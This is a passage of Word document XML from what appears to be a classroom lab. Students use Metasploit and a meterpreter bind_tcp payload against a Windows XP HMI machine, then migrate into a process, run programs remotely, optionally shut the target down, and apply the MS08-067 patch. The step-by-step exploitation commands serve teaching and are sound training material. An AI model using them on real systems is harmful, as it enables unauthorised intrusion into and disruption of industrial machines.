    <w:p w14:paraId="45AF98AB" w14:textId="48A04AF6" w:rsidR="00C3710E" w:rsidRDefault="00C3710E" w:rsidP="00C3710E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>You could also load the module by typing the number associated with the module in the search results (in this case 0) (Example).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245EA944" w14:textId="60823950" w:rsidR="00C3710E" w:rsidRDefault="00C3710E" w:rsidP="00C3710E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EDD963D" wp14:editId="471B4F59">
            <wp:extent cx="5029200" cy="988109"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="84768943"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68943" name="Picture 5" descr="A screenshot of a computer&#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029200" cy="988109"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C80A033" w14:textId="39B45D64" w:rsidR="00C3710E" w:rsidRDefault="00C3710E" w:rsidP="00C3710E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3710E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to view the options available to the module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08644683" w14:textId="54AAA7C8" w:rsidR="00C3710E" w:rsidRDefault="00C3710E" w:rsidP="00C3710E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set the IP address of the target (remote) host by typing the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3710E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set RHOSTS 10.0.255.101</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0D3A26" w14:textId="77777777" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Part 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7C8AC3" w14:textId="77777777" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Find, Load and Configure a Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD9E7FB" w14:textId="77777777" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:r>
        <w:t>In this part of the lab you will find a payload that can be used to exploit the target system, then you will load and configure that payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4A646B" w14:textId="167337F7" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00216769">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>show payloads</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to view the payloads that may work with the module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FB3655" w14:textId="41A0CF27" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A lot of payloads will be listed so you may wish to scroll to view them all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E605670" w14:textId="74D166A5" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set the payload which will establish a meterpreter TCP connection to the remote system with the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00216769">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set payload windows/meterpreter/bind_tcp</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31666FFD" w14:textId="691A5532" w:rsidR="00C3710E" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00216769">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to view the options available to the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B62BB6F" w14:textId="77777777" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Part 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F129870" w14:textId="4237DF43" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit the Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676EDDE5" w14:textId="77777777" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:r>
        <w:t>In this section of the lab you will run the exploit then practice working in the target environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734D68F2" w14:textId="716D8032" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="001F617C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to run the module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC0115C" w14:textId="14B79110" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="001F617C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>If the exploit fails to create a session reboot the HMI system then try running the exploit command again. The vulnerability scan has the tendency to break things.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1266E398" w14:textId="0F426ACC" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00265B64">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to view the available meterpreter commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10360AB9" w14:textId="2A6FEC95" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00265B64">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to determine what your current user name is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04462025" w14:textId="237EFC55" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Record the username in the </w:t>
      </w:r>
      <w:r w:rsidR="00265B64">
        <w:t>lab form</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114BE31E" w14:textId="76E38A2B" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00265B64">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>help ps</w:t>
      </w:r>
      <w:r w:rsidRPr="00265B64">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to view help details regarding the ps command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2754A7CD" w14:textId="295DD98B" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00747D8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ps -U student</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to view all programs that are running as the student user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779CCEB8" w14:textId="734DAB0B" w:rsidR="00265B64" w:rsidRDefault="00747D8E" w:rsidP="00265B64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05A7B41E" wp14:editId="340B1CD5">
            <wp:extent cx="5029200" cy="1317478"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2112844118"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844118" name="Picture 6" descr="A screenshot of a computer&#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029200" cy="1317478"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B63C42" w14:textId="3BE25692" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Note the PID number of the AdvancedHMI.exe process that is running as the student user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0767DE9C" w14:textId="5879BF91" w:rsidR="00747D8E" w:rsidRDefault="00747D8E" w:rsidP="00747D8E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The PID of the AdvancedHMI.exe process on your system will almost certainly be different than the one shown in the example.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6C7484" w14:textId="480ADF31" w:rsidR="00747D8E" w:rsidRDefault="00747D8E" w:rsidP="00747D8E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5833ADF6" wp14:editId="51A5AE40">
            <wp:extent cx="5029200" cy="1317478"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1862553450"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844118" name="Picture 6" descr="A screenshot of a computer&#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029200" cy="1317478"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1404F638" w14:textId="4E940C66" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Type the command help migrate to view help details regarding the migrate command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D668B67" w14:textId="01632023" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00747D8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>migrate the_pid_of_the_AdvancedHMI.exe process</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Example).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3872429B" w14:textId="247A824F" w:rsidR="00747D8E" w:rsidRDefault="00216769" w:rsidP="00747D8E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Replace the text the_pid_of_the_AdvancedHMI.exe in the command with PID of the AdvancedHMI.exe process you found earlier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F865746" w14:textId="2D962DDB" w:rsidR="00747D8E" w:rsidRDefault="00747D8E" w:rsidP="00747D8E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7569E8BF" wp14:editId="7B12DE72">
            <wp:extent cx="3057952" cy="476316"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="730612578" name="Picture 7" descr="A close up of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563039" name="Picture 7" descr="A close up of white tex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3057952" cy="476316"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21283945" w14:textId="0AE5DE1B" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF4242">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to determine what your current user name is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F29D31A" w14:textId="7B5C195A" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Record the username shown in the </w:t>
      </w:r>
      <w:r w:rsidR="00CF4242">
        <w:t>lab form</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22945E6B" w14:textId="01F48115" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF4242">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>help execute</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF4242">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to view help details regarding the execute command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F6FDC6" w14:textId="715298D1" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF4242">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>execute -f sol.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to execute the program sol.exe on the remote system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7077B9" w14:textId="51604876" w:rsidR="00216769" w:rsidRDefault="00216769" w:rsidP="00216769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access the HMI system and note the effects of the exploit in the </w:t>
      </w:r>
      <w:r w:rsidR="00CF4242">
        <w:t>lab form</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F33DA4" w14:textId="77777777" w:rsidR="00702B44" w:rsidRDefault="00702B44" w:rsidP="00702B44">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Part 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2390729A" w14:textId="77777777" w:rsidR="00702B44" w:rsidRDefault="00702B44" w:rsidP="00702B44">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>(Challenge/Optional) Shutdown the Target System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC2EE25" w14:textId="77777777" w:rsidR="00702B44" w:rsidRDefault="00702B44" w:rsidP="00702B44">
      <w:r>
        <w:t>In this optional section of the lab you are going to shutdown the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0074E68C" w14:textId="1820E596" w:rsidR="00702B44" w:rsidRDefault="00702B44" w:rsidP="00702B44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Access the Kali system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBD46AD" w14:textId="4722FCCD" w:rsidR="00702B44" w:rsidRDefault="00702B44" w:rsidP="00702B44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use Metasploit to shutdown the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F74DE53" w14:textId="3D24C90E" w:rsidR="00CF4242" w:rsidRDefault="00702B44" w:rsidP="00702B44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Record the command(s) you used to shutdown the target system in the </w:t>
      </w:r>
      <w:r>
        <w:t>lab form</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D79416" w14:textId="77777777" w:rsidR="00FB6635" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Part 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2758ECFB" w14:textId="77777777" w:rsidR="00FB6635" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Eliminate the Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BEC586" w14:textId="77777777" w:rsidR="00FB6635" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:r>
        <w:t>In this section of the lab you will patch the Windows system to eliminate the vulnerability then use Metasploit to verify the vulnerability no longer exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39833E17" w14:textId="7DDB83D9" w:rsidR="00FB6635" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6635">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to close the Metasploit session on the Kali system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF1D543" w14:textId="537EB8D4" w:rsidR="00FB6635" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Access the HMI system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8F7489" w14:textId="1ECD5034" w:rsidR="00FB6635" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Reboot the HMI system to clear the effects of the Metasploit session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7675B9" w14:textId="669BEE2D" w:rsidR="00FB6635" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>After the HMI system had rebooted, start the patch process by double clicking on the windowsxp-ms08-067.exe file found on the Windows XP desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABB1561" w14:textId="45DDC134" w:rsidR="00FB6635" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6749C387" wp14:editId="6FBDFCE6">
            <wp:extent cx="5029200" cy="4140493"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33503133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031339" name="Picture 335031339"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="4140493"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F1EC3" w14:textId="060C7F5E" w:rsidR="00FB6635" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Click Next when the Software Update Installation Wizard screen appears.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589BEF89" w14:textId="514846AD" w:rsidR="00FB6635" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Select the I Agree option on the License Agreement page then click the Next button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71414CA8" w14:textId="474D5DA0" w:rsidR="00FB6635" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>After the installation has completed click the Finish button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7126CCD4" w14:textId="42E8717E" w:rsidR="00FB6635" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wait for the HMI system to reboot then access the Kali system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788CCE55" w14:textId="1C6F59CD" w:rsidR="00FB6635" w:rsidRDefault="00FB6635" w:rsidP="00FB6635">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
